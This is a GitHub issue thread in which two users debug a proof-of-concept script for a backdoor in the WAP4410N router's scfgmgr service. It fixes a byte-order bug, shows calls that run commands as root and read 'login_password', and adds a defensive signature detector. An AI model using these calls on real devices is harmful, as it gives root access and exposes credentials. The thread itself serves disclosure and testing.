
WAP4410N #11

Closed
matthew1471 opened this Issue · 24 comments

4 participants

@matthew1471

Listens to port and responds to data with "ScMM" but your Python script doesn't work in its current form.

PID VID: WAP4410N-E V02
Software Version: 2.0.6.1

@elvanderb
Owner

strange... I'll investigate :)
Is there any error/message?

@matthew1471

I have a PCAP if you want me to e-mail it?

Edit: Actually uploaded it here : http://filebin.ca/17UJu55XztDv/Capture.pcapng

@elvanderb
Owner

no, thank you, I'll search the firmware.

@matthew1471

Okay thanks :-). Let me know if I can help.

@elvanderb
Owner

The binary in your firmware has all the symbols :) nice
I had a quick look at your version of scfgmgr and it seems to work like the WAG200G one (even if the code is a little bit different).
I'll soon update my code to add the shell; could you please test it on your router when it's up?

@matthew1471

Certainly will, thanks! Let me know when it's up.

@elvanderb
Owner

updated, could you test it and paste the result?

@elvanderb
Owner

you can also try some commands like 'ps'

@matthew1471

backdoorolol.py

Traceback (most recent call last):
File "backdoorolol.py", line 41, in
print send_message(s, 7, 'echo "welcome, here is a root shell, have fun"')[1]
File "backdoorolol.py", line 19, in send_message
assert(sig == 0x53634D4D)
AssertionError

@matthew1471

I added:
print hex(sig)

and got:
0x4d4d6353

Which is backwards... So, endian?

@elvanderb
Owner

Yep :)
You're right :)
Your router is big endian, mine is little endian.
This backdoor is really badly coded :D
I'll add some code to detect that, thank you very much for taking the time to report this :)
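
The endianness check the two of you worked out above, written up as an added example (not elvanderb's script and not code from the PoC repository): the reply's first four bytes are the "ScMM" signature, and unpacking them little-endian yields 0x53634D4D on a little-endian router but 0x4D4D6353 on a big-endian one. The function below turns that into a detector a defender can run over captured replies to spot the service on either byte order; the sample payloads and hosts are constructed for the example, and the assumption that the signature is the first thing in the reply is taken from the traceback in this thread.

```python
import struct
from typing import List, Optional, Tuple

# Signature constants from this thread: the same four bytes read as a
# little-endian uint32 on the two router families.
SIG_LITTLE_ENDIAN = 0x53634D4D  # wire bytes b"MMcS" (WAG200G, little-endian)
SIG_BIG_ENDIAN = 0x4D4D6353     # wire bytes b"ScMM" (WAP4410N, big-endian)


def detect_endianness(reply: bytes) -> Optional[str]:
    """Return 'little' or 'big' if reply starts with the backdoor signature,
    else None.  Assumes (as in the thread) the signature is the first
    four bytes of the service's reply."""
    if len(reply) < 4:
        return None
    sig = struct.unpack("<I", reply[:4])[0]
    if sig == SIG_LITTLE_ENDIAN:
        return "little"
    if sig == SIG_BIG_ENDIAN:
        return "big"
    return None


def scan_replies(samples: List[Tuple[str, bytes]]) -> List[Tuple[str, str]]:
    """Flag every (host, payload) pair whose payload carries the signature.
    Returns (host, endianness) for each hit, in input order."""
    hits = []
    for host, payload in samples:
        endianness = detect_endianness(payload)
        if endianness is not None:
            hits.append((host, endianness))
    return hits


# Constructed sample replies (not real captures): two signature variants
# and one ordinary HTTP banner that must not be flagged.
SAMPLE_REPLIES = [
    ("192.0.2.10", b"MMcS" + b"\x00" * 8),
    ("192.0.2.11", b"ScMM" + b"\x00" * 8),
    ("192.0.2.12", b"HTTP/1.1 200 OK\r\n"),
]

if __name__ == "__main__":
    for host, endianness in scan_replies(SAMPLE_REPLIES):
        print("%s: signature present, %s-endian device" % (host, endianness))
```

Because the check is done on the raw bytes rather than on a host-order integer, the same detector works whichever byte order the scanning machine itself uses.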

@elvanderb
Owner

Could you test the last version please?

@matthew1471

Needed to bug fix this line:
elif sig == 0X4D4D6353 :

However it now works! CONFIRMED!

Thank you very much for your time and patience :)

@elvanderb
Owner

Oh yes, my bad :)
you are welcome, thank you for your testing and report :)

@matthew1471

No, thank you :-)

Can you see from the firmware if there's a similar getvar function like with yours?

@elvanderb
Owner

you can use the command 1 to dump all the available variables, command numbers are the same :)
command to use to dump all the vars:
send_message(s, endianness, 1) # dump all the variables

If I wasn't lazy I would code a real PoC with command line parameters :D

@matthew1471

Ah I kept trying with 2 and forgot about 1.

For 2 on this model it needs to be:
print send_message(s, endianness, 2, "login_password")[1]

The backdoor seems a bit unstable: if you try executing something it doesn't like, it disconnects you, and I don't seem to be able to close my connections properly (I managed to get it to refuse to let me connect until I rebooted the AP).

Here's the contents of /bin/

ls /bin/ -l
lrwxrwxrwx 1 0 0 7 watch -> busybox
lrwxrwxrwx 1 0 0 7 vi -> busybox
lrwxrwxrwx 1 0 0 7 umount -> busybox
lrwxrwxrwx 1 0 0 7 touch -> busybox
lrwxrwxrwx 1 0 0 7 sleep -> busybox
lrwxrwxrwx 1 0 0 7 sh -> busybox
lrwxrwxrwx 1 0 0 7 sed -> busybox
lrwxrwxrwx 1 0 0 7 rm -> busybox
lrwxrwxrwx 1 0 0 7 pwd -> busybox
lrwxrwxrwx 1 0 0 7 ps -> busybox
lrwxrwxrwx 1 0 0 7 ping6 -> busybox
lrwxrwxrwx 1 0 0 7 ping2file -> busybox
lrwxrwxrwx 1 0 0 7 ping -> busybox
lrwxrwxrwx 1 0 0 7 mv -> busybox
lrwxrwxrwx 1 0 0 7 mount -> busybox
lrwxrwxrwx 1 0 0 7 mkdir -> busybox
lrwxrwxrwx 1 0 0 7 ls -> busybox
lrwxrwxrwx 1 0 0 7 login -> busybox
lrwxrwxrwx 1 0 0 7 ln -> busybox
lrwxrwxrwx 1 0 0 7 kill -> busybox
lrwxrwxrwx 1 0 0 7 hostname -> busybox
lrwxrwxrwx 1 0 0 7 grep -> busybox
lrwxrwxrwx 1 0 0 7 fgrep -> busybox
lrwxrwxrwx 1 0 0 7 egrep -> busybox
lrwxrwxrwx 1 0 0 7 echo -> busybox
lrwxrwxrwx 1 0 0 7 dmesg -> busybox
lrwxrwxrwx 1 0 0 7 df -> busybox
lrwxrwxrwx 1 0 0 7 date -> busybox
lrwxrwxrwx 1 0 0 7 cp -> busybox
lrwxrwxrwx 1 0 0 7 chmod -> busybox
lrwxrwxrwx 1 0 0 7 cat -> busybox
-rwxr-xr-x 1 0 0 526260 busybox
lrwxrwxrwx 1 0 0 7 ash -> busybox

and the supported features of busybox:

busybox
BusyBox v1.1.0 (2011.10.27-14:28+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions:
[, [[, ash, brctl, busybox, cat, chmod, cp, cut, date, df, dmesg,
echo, egrep, fgrep, free, ftpget, ftpput, grep, hostname, ifconfig,
init, insmod, kill, killall, ln, login, ls, lsmod, mkdir, mount,
mv, passwd, ping, ping2file, ping6, ps, pwd, reboot, rm, rmmod,
route, sed, sh, sleep, tail, telnetd, test, tftp, top, touch,
umount, vi, watch, which, xargs

@elvanderb
Owner

Nice, thank you :)
I'm updating the PoC to make it a little bit more user friendly ;)

@matthew1471

Just tried the new version, works well. Thanks for researching this and helping to make the product safer!

Just wondering but given our endian discovery, your list of "Backdoor is not working in", do these need to be re-checked with the new code?

@elvanderb
Owner

I don't think so, people reported routers with closed ports.
Thank you for your testing :) I just uploaded a new version that fixes some bugs

@elvanderb
Owner

woops, fixed :)

@elvanderb elvanderb closed this
@avsavchenko

Doesn't work with new firmware 2.0.7.4

@an3k

WAP4410N (also known as WAP4410N-E, it's the same device) Hardware Revision 01 and 02 are Linksys (in fact "Linksys by Cisco") products, Rev 03 is pure Cisco.

Linksys was never a company on its own. It was just a "brand" name Cisco used for their SOHO products.
